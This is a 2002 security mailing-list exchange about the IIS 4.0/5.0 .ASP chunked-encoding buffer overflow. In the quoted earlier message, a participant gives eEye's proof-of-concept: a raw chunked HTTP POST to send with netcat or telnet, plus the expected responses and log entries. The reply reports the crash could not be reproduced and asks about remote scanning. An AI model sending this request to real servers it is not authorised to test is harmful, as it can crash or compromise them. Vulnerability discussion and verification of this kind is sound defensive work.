RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow

From: MadHat (madhat@unspecific.com)
Date: 04/12/02


From: MadHat <madhat@unspecific.com>
To: Erik Parker <eparker@mindsec.com>
Date: 12 Apr 2002 09:11:55 -0500

I have not been able to reproduce these results. I have managed to lock
up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
appear and no entries in the Application Log. I have also been able get
the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
still no popup or messages.

Is there a reliable way to scan for these vulnerabilities remotely?

On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
> JM> Anyone have a proof of concept for this exploit?
>
> eEye included some. Use this with "netcat" or "telnet"
>
> replace [enter] with an actual pressing of your enter key (look at the
> bottom, you can cut n paste)
>
> It should return something like this, if it worked (and generate a popup
> error to you that says "Unknown has generated errors")
>
> HTTP/1.1 100 Continue
> Server: Microsoft-IIS/5.0
> Date: Wed, 27 Mar 2002 23:37:32 GMT
>
> If it fails, it'll say something like:
>
> HTTP/1.1 500 Server Error
> Server: Microsoft-IIS/5.0
>
>
> The application log will say:
>
> Active Server Pages service has started
> Access performance data was denied to IWAM_netbiosname as attempted from c:\WINNT\SYSTEM32\Drwtsn32.exe
>
>
> **************Begin Session****************
> POST /iisstart.asp HTTP/1.1
> Accept: */*
> Host: eeye.com
> Content-Type: application/x-www-form-urlencoded
> Transfer-Encoding: chunked
>
> 10
> PADPADPADPADPADP
> 4
> DATA
> 4
> DEST
> 0
> [enter]
> [enter]
> **************End Session******************
>

-- 
MadHat at Unspecific.com
gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
Key fingerprint = E786 7B30 7534 DCC2 94D5  91DE E922 0B21 9DDC 3E98